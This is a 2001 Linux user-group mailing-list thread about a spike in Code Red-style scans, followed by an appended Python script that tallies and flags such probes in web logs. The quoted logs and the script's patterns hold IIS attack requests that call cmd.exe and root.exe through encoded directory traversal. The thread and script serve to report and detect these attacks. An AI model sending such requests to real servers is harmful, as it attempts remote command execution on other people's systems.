[ale] CodeRed attacks, here we go again.

Shawn Veader veader at mail.com
Tue Sep 18 11:32:13 EDT 2001


I would agree. I posted this about a month back but it shows
a calendar with hits per day and you can see that it has 
definitely spiked in the last two days....

http://www.veader.org/codeRedStats.html
(or if Telocity still hasn't gotten their DNS straight.... <grr>)
http://veader.die.ms/codeRedStats.html
--
shawn veader


On Tuesday 18 September 2001 10:28 am, you wrote:
> Ditto here.  400 hits in 2 hours.  Looks like another Code Red
> Variant......
>
> Mike
>
> -----Original Message-----
> From: Terry Lee Tucker [mailto:terry at esc1.com]
> Sent: Tuesday, September 18, 2001 10:24 AM
> To: SAngell at nan.net; ale at ale.org
> Subject: Re: [ale] CodeRed attacks, here we go again.
>
>
> I'm getting hit with the following:
>
> 208.5.209.246 - - [18/Sep/2001:10:30:26 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283
> 208.5.209.246 - - [18/Sep/2001:10:30:27 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 281
> 208.5.209.246 - - [18/Sep/2001:10:30:28 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
> 208.5.209.246 - - [18/Sep/2001:10:30:30 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
> 208.5.209.246 - - [18/Sep/2001:10:30:31 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
> 208.5.209.246 - - [18/Sep/2001:10:30:36 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322
> 208.5.209.246 - - [18/Sep/2001:10:30:37 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322
> 208.5.209.246 - - [18/Sep/2001:10:30:39 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338
> 208.5.209.246 - - [18/Sep/2001:10:30:40 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
> 208.5.209.246 - - [18/Sep/2001:10:30:41 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
>
> Obviously, someone is trying to get something from a windoze box.
>
> SAngell at nan.net wrote:
> > I am being flooded by Code Red attacks originating from network 205.152.x.x all
> > by the variant which is attempting to drop the trojan backdoor on to my servers.
> > either root.exe or explorer.exe. This attack is worse than any I have previously
> > seen with hundreds of attempts in the last 5 minutes.
> >
> > Anyone else witnessing these?
> >
> > \_\_\_\_\_\_\_\_\_\_\_/_/_/_/_/_/_/_/_/_/_/
> > \_    Steve Angell,  MCSE, CCNA           _/
> > \_    MIS Operations Manager               _/
> > \_    TSYS Total Debt Management  _/
> > \_    Norcross, GA                                   _/
> > \_    Phone 770-409-5570                    _/
> > \_    Fax      770-416-1752                   _/
> > \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/
> >
> > --
> > To unsubscribe: mail majordomo at ale.org with "unsubscribe ale" in message body.
--
To unsubscribe: mail majordomo at ale.org with "unsubscribe ale" in message body.
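
Added example, not part of the original messages: a small Python tally of the probe requests quoted in this thread, counted per day and source address (the kind of hits-per-day view mentioned above) and flagging any probe the server did not answer with a 4xx. The rule names, function names and sample source addresses are this example's own assumptions; the request paths are those quoted in the thread.

```python
import re
from collections import Counter

# Apache Common Log Format: host ident user [day:time zone] "METHOD path proto" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[(\d{2}/\w{3}/\d{4}):[^\]]+\] '
                 r'"(\S+) (\S+)[^"]*" (\d{3}) \S+$')

# Rule names are this example's own; the patterns come from the quoted requests.
RULES = [
    ("root.exe-request", re.compile(r"/root\.exe\?", re.I)),
    ("cmd.exe-request", re.compile(r"/cmd\.exe\?", re.I)),
    # %25 is an encoded '%', so ..%255c only becomes ..\ after a second decode.
    ("double-encoded-traversal", re.compile(r"\.\.%25(?:5c|2f)", re.I)),
    # Lead bytes 0xC0/0xC1 never occur in well-formed UTF-8.
    ("invalid-utf8-traversal", re.compile(r"\.\.%c[01]%[0-9a-f]{2}", re.I)),
]

def classify(path):
    """Return the name of every rule matching the raw, undecoded request path."""
    return [name for name, rx in RULES if rx.search(path)]

def summarize(lines):
    """Tally probes per (day, source) and per rule; flag any not answered 4xx."""
    per_day_src, per_rule, not_rejected, skipped = Counter(), Counter(), [], 0
    for line in lines:
        m = CLF.match(line.strip())
        if not m:                      # e.g. an entry broken by mail line-wrapping
            skipped += 1
            continue
        host, day, _method, path, status = m.groups()
        labels = classify(path)
        if labels:
            per_day_src[(day, host)] += 1
            per_rule.update(labels)
            if not status.startswith("4"):
                not_rejected.append((host, path, status))
    return per_day_src, per_rule, not_rejected, skipped

# Constructed sample: request paths as quoted above, documentation-range source IPs.
SAMPLE = """\
192.0.2.10 - - [18/Sep/2001:10:30:26 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283
192.0.2.10 - - [18/Sep/2001:10:30:31 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
192.0.2.10 - - [18/Sep/2001:10:30:41 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
192.0.2.77 - - [18/Sep/2001:10:31:02 -0400] "GET /index.html HTTP/1.0" 200 1043
192.0.2.10 - - [18/Sep/2001:10:30:39 -0400] "GET
""".splitlines()

if __name__ == "__main__":
    print(summarize(SAMPLE))
```

An entry in `not_rejected` means a probe path was answered with something other than a 4xx and that host deserves a closer look; `skipped` counts lines that did not parse, such as entries split by line wrapping.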




